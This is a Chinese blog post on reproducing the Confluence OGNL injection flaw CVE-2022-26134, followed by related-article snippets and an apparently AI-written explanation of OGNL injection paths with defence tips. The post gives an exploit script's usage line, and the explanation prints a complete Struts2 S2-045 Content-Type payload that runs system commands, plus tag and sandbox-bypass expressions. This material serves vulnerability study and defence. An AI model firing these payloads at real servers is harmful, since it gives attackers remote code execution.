Confluence OGNL 注入漏洞(CVE-2022-26134)复现

最新推荐文章于 2025-10-21 11:55:20 发布
原创 最新推荐文章于 2025-10-21 11:55:20 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #乌鸦安全 #Confluence OGNL #CVE-2022-26134

更新时间:2022.06.05

1. 漏洞描述

Confluence是一款专业的企业知识管理与协同软件,常用于企业wiki的构建,支持团队成员间开展信息共享、文档协作、集体讨论和信息推送等工作,具有较为便捷的编辑和站点管理特性。该软件由Atlassian公司负责开发和维护。
2022年6月3日,国家信息安全漏洞共享平台(CNVD)收录了Confluence远程代码执行漏洞(CNVD-2022-43094,对应CVE-2022-26134)。未经身份验证的攻击者利用该漏洞可在目标服务器执行任意代码。目前,漏洞细节信息尚未公开,厂商已发布漏洞缓解建议,暂未发布修复补丁。
参考至:https://www.cnvd.org.cn/webinfo/show/7756

image.png

2. 影响版本

所有未打补丁的版本均受到影响,请尽快升级至以下版本

7.4.17
7.13.7
7.14.3
7.15.2
7.16.4
7.17.4
7.18.1

参考:https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. 漏洞复现

本文仅对其进行简单复现,相关脚本请至https://github.com/crow821/下载。
或者在本公众号回复关键字:26134 进行下载

image.png

使用方法:

python3 CVE-2022-26134.py http://127.0.0.1 whoami

警告⚠️

漏洞仅限本地复现使用,请遵守网络安全法律法规,违者使用与本程序开发者无关

image.png

image.png

Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 3385
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
Atlassian Confluence 远程代码执行 CVE-2022-26134漏洞复现
m0_60635609的博客
04-07 1123
Atlassian Confluence是Atlassian公司出品的专业wiki程序。攻击者可利用漏洞在未经身份验证的情况下,远程构造OGNL表达式进行注入,在Confluence Server或Data Center上执行任意代码。请相关用户尽快自检并采取措施进行防护。(Confluence还有个RCE,为了好区分,我习惯把是CVE-2021-26084这个叫OGNL表达式注入命令执行漏洞,在后续的文章,我也会复现CVE-2021-26084)
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134复现
热门推荐
weixin_42489549的博客
06-29 1万+
CVE-2022-26134 Confluence远程命令执行漏洞复现
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
最新发布
2302_76672693的博客
10-21 786
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序序列化就是为了传输遍历,把一个对象类型的数据转换成字符串进行传输;
cve-2022-26134漏洞复现_实战_Confluence最新rce漏洞
恒安嘉新66的博客
06-11 3684
Confluence最新rce漏洞cve-2022-26134漏洞复现,有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
CVE -2022-26134漏洞复现(Confluence OGNL 注入rce漏洞)
qq_17754023的博客
06-04 5627
Atlassian ConfluenceAtlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。 0x02 漏洞概述Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。...
ATLASSIAN CONFLUENCE 远程代码执行漏洞CVE-2022-26134漏洞复现
Websec
06-07 1472
近日,Atlassian官方发布了Confluence Server和Data Center OGNL 注入漏洞CVE-2022-26134)的安全公告,远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,CVSS评分为10。目前该漏洞细节与PoC已被公开披露,且被检测到存在在野利用。请相关用户尽快采取措施进行防护。Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一
Confluence OGNL注入漏洞复现(CVE-2022-26134)
云舒的博客
07-29 1384
Confluence OGNL注入漏洞复现(CVE-2022-26134)
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134
Brucetg的博客
06-06 5096
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
【风险预警】Confluence Wiki OGNL注入漏洞CVE-2022-26134
murphysec的博客
06-04 4717
6月4日,墨菲安全实验室监测发现Atlassian修复了Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞。Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat
Atlassian Confluence CVE-2022-26134 RCE漏洞
4SecNet团队专栏
04-22 1440
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
热爱学习,喜欢折腾!
10-09 2329
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。2022年06月04日,发现Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2022-26134漏洞等级:严重,漏洞评分:9.8。目前该漏洞安全补丁已发布,漏洞细节已公开,POC已公开。
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134漏洞复现
网安君的博客
06-07 3683
本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。CVE-2022-26134漏洞是一个严重的未经身份验证的远程代码执行漏洞,通过 OGNL 注入利用并影响 1.3.0 版之后的所有 Atlassian Confluence 和 Data Center 2016 服务器。成功利用允许未经身份验证的远程攻击者创建新的管理员帐户、执行命令并最终接管服务器。1.3.0 ..
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 8492
CVE-2022-26134 Confluence远程命令执行漏洞复现
漏洞复现】Atlassian Confluence(CVE-2022-26134)OGNL远程代码执行
李同學的安全圈
06-06 2565
本篇文章所涉及技术与工具仅用于技术研究、漏洞复现,切勿用于非法渗透攻击行为,造成任何后果与本作者无关,切记!!!Atlassian Confluence 是一款各企业广泛使用的 wiki 系统。在上存在OGNL 注入漏洞,恶意攻击者可以利用该漏洞在目标Atlassian Confluence Server and Data Center服务器上注入恶意ONGL表达式 ,造成远程代码执行。......
Atlassian Confluence 远程代码执行漏洞CVE-2022-26134)风险通告及POC复现
qq_18209847的博客
06-07 3333
信息安全部监测到Atlassian Confluence Server and Data Center (CVE-2022-26134)远程代码执行漏洞
Confluence OGNL表达式注入命令执行漏洞CVE-2022-26134)vulhub漏洞复现
qq_53003652的博客
07-18 465
Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新,通告了一个严重且已在利用的代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。进入安装页面,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为。PostgreSQL数据库地址为。,burpsuite抓包。
confluence注入漏洞
zzf9347的博客
03-18 492
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。经过查找资料发现,这是confluence的一个漏洞,名称叫做注入漏洞,编号:CVE-2021-26084。这台confluence应用的访问是用nginx做的反向代理,没法直接访问,也没有直接开放访问端口。排查nginx代理服务器的访问日志,发现有几个异常ip访问了。重启后,继续观察,发现再有相关路径的访问全部被拦截。
OGNL 注入漏洞触发路径
03-27
<think>嗯,用户之前问过文件上传漏洞的触发路径,现在又转向了OGNL注入漏洞。这说明用户可能正在学习或研究各种Web安全漏洞,需要详细了解不同类型的攻击方式。用户可能是安全研究人员、开发者,或者学生,希望深入理解漏洞原理以便防御。 首先,我需要回顾OGNL注入的基本概念。OGNL是Object-Graph Navigation Language,主要用于Java框架如Struts中处理表达式。注入漏洞通常发生在框架未正确过滤用户输入,导致攻击者能够执行任意代码。 接下来,思考用户的需求。他们可能已经知道文件上传漏洞的触发路径,现在想了解另一个漏洞类型。需要将OGNL注入的触发路径结构化,分点说明,类似于之前的回答,保持一致性。同时,要确保技术细节准确,比如具体的攻击示例和触发条件。 用户可能想知道漏洞是如何被触发的,包括哪些框架或场景容易受影响,攻击者如何利用输入点,以及具体的利用方式。需要覆盖常见的触发路径,如参数注入、标签属性注入、二次解析等,并举例说明,比如Struts2的历史漏洞。 另外,用户可能对防御措施感兴趣,所以在回答的最后要给出防御建议,帮助他们在实际开发中避免此类漏洞。需要强调输入过滤、沙箱机制、框架升级和权限最小化等关键点。 还要注意回答的结构清晰,分点列出,使用标题和子标题,方便用户阅读。同时,确保使用中文,避免专业术语过于晦涩,必要时进行解释,比如解释OGNL是什么,以及它在哪些框架中被使用。 最后,检查是否有遗漏的重要信息,确保覆盖所有常见的触发路径和示例,比如提到CVE编号,增强回答的可信度。同时,确保技术细节正确,比如提到Struts2的漏洞实例,如S2-045、S2-061,以及攻击payload的构造方式。 总结来说,回答需要结构清晰,技术准确,示例具体,并包含防御措施,满足用户从理解到应用的需求。</think>OGNL(Object-Graph Navigation Language)注入漏洞是一种因表达式解析不当导致的安全问题,常见于基于Java的Web框架(如Struts2)。其核心触发路径是**攻击者通过控制用户输入,构造恶意OGNL表达式,最终在服务端执行任意代码**。以下是典型的触发路径及技术细节: --- ### **1. 用户输入直接拼接OGNL表达式** - **触发条件**:框架将用户输入未经过滤直接拼接到OGNL表达式中解析。 - **攻击示例**: - 攻击者通过HTTP参数注入OGNL表达式。例如,在Struts2的某些漏洞中(如S2-045),通过`Content-Type`头传入恶意表达式: ```http Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} ``` - 服务端解析该表达式后,执行系统命令(如`id`)并返回结果。 --- ### **2. 动态调用方法时参数可控** - **触发条件**:框架允许通过参数动态调用对象方法,但未对方法名或参数进行过滤。 - **攻击示例**: - 在Struts2的`ParametersInterceptor`中,若配置`acceptParamNames`过于宽松,攻击者可传入类似`(#application).get('key')`的表达式,直接操作ServletContext等对象。 --- ### **3. 标签属性值解析漏洞** - **触发条件**:UI标签(如JSP标签)的属性值被解析为OGNL表达式。 - **攻击示例**: - 在Struts2的某些版本中(如S2-061),攻击者通过控制标签属性触发表达式解析: ```jsp <s:textfield name="%{(#_memberAccess['allowStaticMethodAccess']=true, @java.lang.Runtime@getRuntime().exec('calc'))}"/> ``` - 服务端解析标签时执行表达式,启动计算器程序(`calc`)。 --- ### **4. 二次解析漏洞** - **触发条件**:用户输入在多层解析过程中被错误地二次解析为OGNL表达式。 - **攻击示例**: - 攻击者传入经过URL编码的表达式(如`%25{...}`),框架第一次解码得到`%{...}`,第二次解析时将其作为OGNL表达式执行。 --- ### **5. 默认沙箱绕过** - **触发条件**:框架的OGNL沙箱防护被绕过(如通过反射修改访问权限)。 - **攻击示例**: - 利用OGNL的上下文特性,通过`#_memberAccess`变量关闭安全限制: ```ognl #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS, @java.lang.Runtime@getRuntime().exec('命令') ``` --- ### **漏洞防御建议** 1. **输入过滤与转义**: - 对用户输入的`%{...}`、`$`等特殊符号进行转义或拦截。 2. **启用OGNL沙箱**: - 限制表达式可访问的类和方法(如Struts2的`struts.ognl.allowStaticMethodAccess`设为`false`)。 3. **升级框架版本**: - 及时修复已知漏洞(如Struts2的S2-045、S2-061等CVE)。 4. **最小化权限运行**: - 使用低权限用户运行应用服务,减少命令执行的影响范围。 --- **总结**:OGNL注入漏洞的核心触发路径是**攻击者通过可控输入点注入恶意表达式**,利用框架解析机制执行任意代码。其危害包括远程命令执行、数据泄露等,需结合框架特性与安全配置进行防御。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值